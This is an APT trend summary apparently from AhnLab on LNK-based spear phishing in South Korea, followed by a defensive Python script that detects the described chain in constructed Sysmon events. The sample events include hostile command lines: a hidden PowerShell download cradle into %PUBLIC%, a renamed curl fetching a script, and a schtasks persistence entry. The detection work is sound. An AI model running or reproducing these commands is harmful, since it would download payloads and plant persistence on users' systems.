December 2025 APT Attack Trend Report (South Korea)
2026-01-14 • AhnLab
AhnLab’s December 2025 South Korea APT telemetry found spear phishing to be the dominant delivery method, with LNK-based attacks accounting for the largest share of observed activity. The LNK chains executed malicious PowerShell commands that either downloaded payloads through services such as the Dropbox API or Google Drive, or wrote local scripts and obfuscated RAT binaries under paths such as %PUBLIC%. Final payloads included XenoRAT and RoKRAT, with capabilities including keylogging and screen capture. A second LNK pattern downloaded AutoIt malware, ran a renamed copy of curl.exe, registered scheduled tasks for persistence, and used lures including North Korean defector support and North Korean human-rights academy documents.
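The chains summarized above map onto a handful of process-creation signals a defender can check for: PowerShell launched from a shell with a download cradle pointing at a cloud host, writes under %PUBLIC%, a binary whose PE OriginalFileName is curl.exe but whose on-disk name is not, and a schtasks /create whose action lives in a public directory. The script below is an added illustration (not AhnLab’s code or data) that runs those four checks over constructed Sysmon-style events; the event field names, the Dropbox and Google Drive URLs, the svchost.exe file name under C:\Users\Public, and the task name are assumptions made for the example, not indicators from the report.

```python
"""Toy detection of the LNK -> PowerShell -> cloud download -> %PUBLIC% chain
and the renamed-curl + scheduled-task pattern, over constructed events.
Field names mirror Sysmon Event ID 1 (Image, OriginalFileName, CommandLine,
ParentImage); all values below are made up for this example."""
import re

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {   # benign: user opens a document from Explorer
        "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "OriginalFileName": "WinWord.exe",
        "CommandLine": r'''"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" "C:\Users\u\Documents\memo.docx"''',
        "ParentImage": r"C:\Windows\explorer.exe",
    },
    {   # LNK lure: Explorer launches hidden PowerShell that pulls a payload
        # from a Dropbox API endpoint (hypothetical URL) into %PUBLIC%
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "OriginalFileName": "PowerShell.EXE",
        "CommandLine": r'''powershell.exe -windowstyle hidden -ep bypass -c "$u='https://content.dropboxapi.com/2/files/download'; iwr $u -OutFile $env:PUBLIC\Music\up.dat"''',
        "ParentImage": r"C:\Windows\explorer.exe",
    },
    {   # AutoIt stage: curl.exe copied under a new name (hypothetical) and
        # used to fetch the script; OriginalFileName still says curl.exe
        "Image": r"C:\Users\Public\Documents\svchost.exe",
        "OriginalFileName": "curl.exe",
        "CommandLine": r'''svchost.exe -s -o C:\Users\Public\Documents\a.au3 https://drive.google.com/uc?export=download&id=1AbCdEfGh''',
        "ParentImage": r"C:\Windows\System32\cmd.exe",
    },
    {   # persistence: scheduled task whose action lives under %PUBLIC%
        "Image": r"C:\Windows\System32\schtasks.exe",
        "OriginalFileName": "schtasks.exe",
        "CommandLine": r'''schtasks /create /sc minute /mo 1 /tn "SystemUpdate" /tr "C:\Users\Public\Documents\svchost.exe C:\Users\Public\Documents\a.au3" /f''',
        "ParentImage": r"C:\Windows\System32\cmd.exe",
    },
]

# Cloud file-hosting domains named in the report; the regex list is ours.
CLOUD_HOSTS = re.compile(r"(dropboxapi\.com|dropbox\.com|drive\.google\.com|googleapis\.com)", re.I)
# Common PowerShell/CLI download primitives.
DOWNLOAD_CRADLE = re.compile(r"\b(iwr|invoke-webrequest|downloadstring|downloadfile|start-bitstransfer|curl|wget)\b", re.I)
# Three spellings of the public profile directory.
PUBLIC_DIR = re.compile(r"(%PUBLIC%|\$env:PUBLIC|C:\\Users\\Public)", re.I)
SHELL_PARENTS = ("explorer.exe", "cmd.exe")
SCRIPT_HOSTS = ("powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe")


def basename(path):
    """Last component of a Windows path, lower-cased."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(event):
    """Return the list of rule names that fire on one process-creation event."""
    findings = []
    img = basename(event["Image"])
    parent = basename(event["ParentImage"])
    cmd = event["CommandLine"]
    orig = event.get("OriginalFileName", "").lower()

    # Rule 1: PowerShell spawned by Explorer/cmd (typical of an LNK launch)
    # carrying a download cradle that targets a cloud file-hosting domain.
    if (img == "powershell.exe" and parent in SHELL_PARENTS
            and DOWNLOAD_CRADLE.search(cmd) and CLOUD_HOSTS.search(cmd)):
        findings.append("lnk_powershell_cloud_download")

    # Rule 2: a script host or shell referencing the public profile directory.
    if img in SCRIPT_HOSTS and PUBLIC_DIR.search(cmd):
        findings.append("public_dir_drop")

    # Rule 3: renamed curl: the PE version resource still says curl.exe
    # while the file on disk carries another name.
    if orig == "curl.exe" and img != "curl.exe":
        findings.append("renamed_curl")

    # Rule 4: scheduled-task creation whose action sits under %PUBLIC%.
    if img == "schtasks.exe" and re.search(r"/create", cmd, re.I) and PUBLIC_DIR.search(cmd):
        findings.append("schtasks_public_action")

    return findings


def scan(events):
    """Map event index -> fired rules, omitting events with no findings."""
    results = {}
    for i, ev in enumerate(events):
        hits = detect(ev)
        if hits:
            results[i] = hits
    return results


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        print(idx, basename(SAMPLE_EVENTS[idx]["Image"]), hits)
```

Rule 3 is the one worth keeping even if the others are tuned down: renaming curl.exe changes the file name but not the OriginalFileName field in its version resource, which Sysmon records, so the mismatch survives whatever name the attacker picks. Rules 1, 2 and 4 will need allow-listing for legitimate software that stages files in C:\Users\Public or fetches updates from Google Drive.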